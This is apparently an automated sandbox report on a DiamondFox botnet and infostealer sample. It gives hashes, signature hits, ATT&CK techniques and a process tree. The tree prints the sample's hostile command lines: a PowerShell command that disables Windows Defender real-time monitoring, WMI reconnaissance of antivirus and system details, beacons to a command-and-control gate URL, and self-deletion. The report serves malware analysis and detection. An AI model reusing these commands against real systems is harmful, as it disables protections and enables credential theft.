diamondfox | 3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187

Analysis

max time kernel
148s
max time network
150s
platform
windows10_x64
resource
win10v20210408
submitted
03-07-2021 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mixazed_20210703-205320.exe
Size

1.8MB
MD5

8703d31eadccffa270ba764a35dfd548
SHA1

6dd74fef8122095da64955abd99f38421629445d
SHA256

3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
SHA512

f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2

Score

10^/10

diamondfox xenarmor botnet discovery password recovery spyware stealer upx

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox
XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
recovery password xenarmor

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Unknown.dll	acprotect
\Users\Admin\AppData\Local\Temp\Unknown.dll	acprotect

DiamondFox payload 12 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe	diamondfox
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral2/memory/4024-229-0x000000000044412E-mapping.dmp	MailPassView
behavioral2/memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral2/memory/640-216-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral2/memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/640-216-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral2/memory/640-218-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral2/memory/2516-226-0x0000000000413E10-mapping.dmp	Nirsoft
behavioral2/memory/2516-228-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral2/memory/4024-229-0x000000000044412E-mapping.dmp	Nirsoft
behavioral2/memory/4024-231-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Downloads MZ/PE file

Executes dropped EXE 13 IoCs

Processes:

d1m5VMTVxQYJevtn.exeDv8Gy0Af.exeDv8Gy0Af.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeUFvoOnkW5oFfKmyk.exe

pid	process
3980	d1m5VMTVxQYJevtn.exe
2216	Dv8Gy0Af.exe
3128	Dv8Gy0Af.exe
904	MicrosoftEdgeCPS.exe
640	MicrosoftEdgeCPS.exe
580	MicrosoftEdgeCPS.exe
2516	MicrosoftEdgeCPS.exe
4024	MicrosoftEdgeCPS.exe
2308	MicrosoftEdgeCPS.exe
3856	MicrosoftEdgeCPS.exe
1272	MicrosoftEdgeCPS.exe
2360	MicrosoftEdgeCPS.exe
416	UFvoOnkW5oFfKmyk.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3140-127-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/3140-129-0x0000000000400000-0x00000000007E4000-memory.dmp	upx
behavioral2/memory/2216-133-0x0000000000400000-0x00000000008DC000-memory.dmp	upx
behavioral2/memory/2216-137-0x0000000000400000-0x00000000008DC000-memory.dmp	upx

Loads dropped DLL 1 IoCs

Processes:

Dv8Gy0Af.exe

pid process

3128 Dv8Gy0Af.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
3128	Dv8Gy0Af.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

Processes:

mixazed_20210703-205320.exe

pid	process
3140	mixazed_20210703-205320.exe
3140	mixazed_20210703-205320.exe
3140	mixazed_20210703-205320.exe
3140	mixazed_20210703-205320.exe
3140	mixazed_20210703-205320.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

mixazed_20210703-205320.exemixazed_20210703-205320.exeDv8Gy0Af.exeMicrosoftEdgeCPS.exe

description	pid	process	target process
PID 740 set thread context of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 3140 set thread context of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 2216 set thread context of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 904 set thread context of 640	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 580	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 2516	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 4024	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 2308	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 3856	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 1272	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 904 set thread context of 2360	904	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2820 taskkill.exe
1164 taskkill.exe
1216 taskkill.exe
1512 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

3772 notepad.exe

pid	process
2820	taskkill.exe
1164	taskkill.exe
1216	taskkill.exe
1512	taskkill.exe

pid	process
3772	notepad.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

Processes:

mixazed_20210703-205320.exeDv8Gy0Af.exepowershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid	process
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
740	mixazed_20210703-205320.exe
3128	Dv8Gy0Af.exe
3128	Dv8Gy0Af.exe
492	powershell.exe
3036	powershell.exe
492	powershell.exe
3036	powershell.exe
3036	powershell.exe
492	powershell.exe
904	MicrosoftEdgeCPS.exe
904	MicrosoftEdgeCPS.exe
640	MicrosoftEdgeCPS.exe
640	MicrosoftEdgeCPS.exe
640	MicrosoftEdgeCPS.exe
640	MicrosoftEdgeCPS.exe
2516	MicrosoftEdgeCPS.exe
2516	MicrosoftEdgeCPS.exe
904	MicrosoftEdgeCPS.exe
904	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mixazed_20210703-205320.exemixazed_20210703-205320.exeDv8Gy0Af.exepowershell.exepowershell.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	740	mixazed_20210703-205320.exe
Token: SeShutdownPrivilege	3140	mixazed_20210703-205320.exe
Token: SeDebugPrivilege	3128	Dv8Gy0Af.exe
Token: SeDebugPrivilege	3036	powershell.exe
Token: SeDebugPrivilege	492	powershell.exe
Token: SeIncreaseQuotaPrivilege	580	wmic.exe
Token: SeSecurityPrivilege	580	wmic.exe
Token: SeTakeOwnershipPrivilege	580	wmic.exe
Token: SeLoadDriverPrivilege	580	wmic.exe
Token: SeSystemProfilePrivilege	580	wmic.exe
Token: SeSystemtimePrivilege	580	wmic.exe
Token: SeProfSingleProcessPrivilege	580	wmic.exe
Token: SeIncBasePriorityPrivilege	580	wmic.exe
Token: SeCreatePagefilePrivilege	580	wmic.exe
Token: SeBackupPrivilege	580	wmic.exe
Token: SeRestorePrivilege	580	wmic.exe
Token: SeShutdownPrivilege	580	wmic.exe
Token: SeSystemEnvironmentPrivilege	580	wmic.exe
Token: SeRemoteShutdownPrivilege	580	wmic.exe
Token: SeUndockPrivilege	580	wmic.exe
Token: SeManageVolumePrivilege	580	wmic.exe
Token: 33	580	wmic.exe
Token: 34	580	wmic.exe
Token: 35	580	wmic.exe
Token: 36	580	wmic.exe
Token: SeIncreaseQuotaPrivilege	580	wmic.exe
Token: SeSecurityPrivilege	580	wmic.exe
Token: SeTakeOwnershipPrivilege	580	wmic.exe
Token: SeLoadDriverPrivilege	580	wmic.exe
Token: SeSystemProfilePrivilege	580	wmic.exe
Token: SeSystemtimePrivilege	580	wmic.exe
Token: SeProfSingleProcessPrivilege	580	wmic.exe
Token: SeIncBasePriorityPrivilege	580	wmic.exe
Token: SeCreatePagefilePrivilege	580	wmic.exe
Token: SeBackupPrivilege	580	wmic.exe
Token: SeRestorePrivilege	580	wmic.exe
Token: SeShutdownPrivilege	580	wmic.exe
Token: SeSystemEnvironmentPrivilege	580	wmic.exe
Token: SeRemoteShutdownPrivilege	580	wmic.exe
Token: SeUndockPrivilege	580	wmic.exe
Token: SeManageVolumePrivilege	580	wmic.exe
Token: 33	580	wmic.exe
Token: 34	580	wmic.exe
Token: 35	580	wmic.exe
Token: 36	580	wmic.exe
Token: SeIncreaseQuotaPrivilege	2232	wmic.exe
Token: SeSecurityPrivilege	2232	wmic.exe
Token: SeTakeOwnershipPrivilege	2232	wmic.exe
Token: SeLoadDriverPrivilege	2232	wmic.exe
Token: SeSystemProfilePrivilege	2232	wmic.exe
Token: SeSystemtimePrivilege	2232	wmic.exe
Token: SeProfSingleProcessPrivilege	2232	wmic.exe
Token: SeIncBasePriorityPrivilege	2232	wmic.exe
Token: SeCreatePagefilePrivilege	2232	wmic.exe
Token: SeBackupPrivilege	2232	wmic.exe
Token: SeRestorePrivilege	2232	wmic.exe
Token: SeShutdownPrivilege	2232	wmic.exe
Token: SeSystemEnvironmentPrivilege	2232	wmic.exe
Token: SeRemoteShutdownPrivilege	2232	wmic.exe
Token: SeUndockPrivilege	2232	wmic.exe
Token: SeManageVolumePrivilege	2232	wmic.exe
Token: 33	2232	wmic.exe
Token: 34	2232	wmic.exe
Token: 35	2232	wmic.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

mixazed_20210703-205320.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid process

3140 mixazed_20210703-205320.exe
3140 mixazed_20210703-205320.exe
580 MicrosoftEdgeCPS.exe
3856 MicrosoftEdgeCPS.exe
1272 MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mixazed_20210703-205320.exemixazed_20210703-205320.exeDv8Gy0Af.exed1m5VMTVxQYJevtn.exeMicrosoftEdgeCPS.exe

description	pid	process	target process
PID 740 wrote to memory of 2844	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 2844	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 2844	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3468	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3468	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3468	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 2252	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 2252	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 2252	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 740 wrote to memory of 3140	740	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 3140 wrote to memory of 3980	3140	mixazed_20210703-205320.exe	d1m5VMTVxQYJevtn.exe
PID 3140 wrote to memory of 3980	3140	mixazed_20210703-205320.exe	d1m5VMTVxQYJevtn.exe
PID 3140 wrote to memory of 3980	3140	mixazed_20210703-205320.exe	d1m5VMTVxQYJevtn.exe
PID 3140 wrote to memory of 2268	3140	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 3140 wrote to memory of 2268	3140	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 3140 wrote to memory of 2268	3140	mixazed_20210703-205320.exe	mixazed_20210703-205320.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 3140 wrote to memory of 2216	3140	mixazed_20210703-205320.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 2216 wrote to memory of 3128	2216	Dv8Gy0Af.exe	Dv8Gy0Af.exe
PID 3980 wrote to memory of 904	3980	d1m5VMTVxQYJevtn.exe	MicrosoftEdgeCPS.exe
PID 3980 wrote to memory of 904	3980	d1m5VMTVxQYJevtn.exe	MicrosoftEdgeCPS.exe
PID 3980 wrote to memory of 904	3980	d1m5VMTVxQYJevtn.exe	MicrosoftEdgeCPS.exe
PID 3980 wrote to memory of 3036	3980	d1m5VMTVxQYJevtn.exe	powershell.exe
PID 3980 wrote to memory of 3036	3980	d1m5VMTVxQYJevtn.exe	powershell.exe
PID 3980 wrote to memory of 3036	3980	d1m5VMTVxQYJevtn.exe	powershell.exe
PID 904 wrote to memory of 492	904	MicrosoftEdgeCPS.exe	powershell.exe
PID 904 wrote to memory of 492	904	MicrosoftEdgeCPS.exe	powershell.exe
PID 904 wrote to memory of 492	904	MicrosoftEdgeCPS.exe	powershell.exe
PID 904 wrote to memory of 580	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 580	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 580	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2232	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2232	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2232	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2532	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2532	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2532	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 640	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 640	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 640	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2864	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2864	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 2864	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 688	904	MicrosoftEdgeCPS.exe	wmic.exe
PID 904 wrote to memory of 688	904	MicrosoftEdgeCPS.exe	wmic.exe

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
2⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
2⤵
PID:3468

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
2⤵
PID:2252

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3140

C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe
"C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3980

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:492

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:580

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" os get caption /FORMAT:List
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_VideoController get caption /FORMAT:List
5⤵
PID:2532

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
5⤵
PID:640

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
5⤵
PID:2864

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
5⤵
PID:688

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
5⤵
PID:2532

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:640

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:580

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2516

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
5⤵
- Executes dropped EXE
PID:4024

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
PID:2308

C:\Windows\notepad.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
6⤵
- Opens file in notepad (likely ransom note)
PID:3772

C:\Windows\write.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
6⤵
PID:3548

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3856

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1272

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
5⤵
- Executes dropped EXE
PID:2360

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
5⤵
PID:2948

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
5⤵
PID:1284

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 2308 /F
5⤵
- Kills process with taskkill
PID:2820

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 1272 /F
5⤵
- Kills process with taskkill
PID:1164

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 2360 /F
5⤵
- Kills process with taskkill
PID:1216

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /PID 3856 /F
5⤵
- Kills process with taskkill
PID:1512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe' -Force -Recurse
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3036

C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe
-a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"
3⤵
PID:2268

C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
-a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2216

C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3128

C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe
"C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe"
3⤵
- Executes dropped EXE
PID:416

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json
MD5
77e6621fd939338d3f19f3dd948ecf43

SHA1
53df8b3a76c5d6c35a99aa7759ff3bd7ec46588c

SHA256
9cb90c1d5c31396519b1f6c73899c062b6ccbd9a8cfc7c0bb054fe88c7825867

SHA512
6e812be4c3b958f0497f91e0eb2e8b77d4a13e2b7af750a30ec9bff3dde09a233b5510ee6333a9ab3182c11ab6c3d38789921d517449c6a03164e216cee43c4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
bc065c5c5d1d183a3d2f98df69ed28fb

SHA1
95e846090cdb6f07894c2b6f41b511ce377b918a

SHA256
3065ae3f485eb795e774a3429ef09825ad1bceb7588788a53e37151533465061

SHA512
6cb343fdf0c01f8223b72ea12828a94bb6ff01b004fa5c7aed7fbe3368814e8747d61492ea775205c7aaab2674e45b880aa0f70dea60591adbe951cb2dda637c

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.log
MD5
4ab56e327e56a995c158a6116430835b

SHA1
bf39dbae7798cc8bd7d7073998b09652412b111b

SHA256
269c32926bf6faebe0581c23903f8dc8cef41ad46b333435d038b81d47f4785e

SHA512
37704769bf293cd6a9c0ccbec359fbb7278f163911d3f2ae27f6c9c3dece55be70c2c5695be953def5984b7eda05953b19581df236c44d5d269cf258e49ab4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe
MD5
ca42e05f9d53c7ec9383307c1ea282bb

SHA1
ed0efa1b59b461dcda08121a39411bee72f6b4cb

SHA256
63a7295e66183379580db16d0d191bb261ccc9edb982980051291c8bdf6c4ade

SHA512
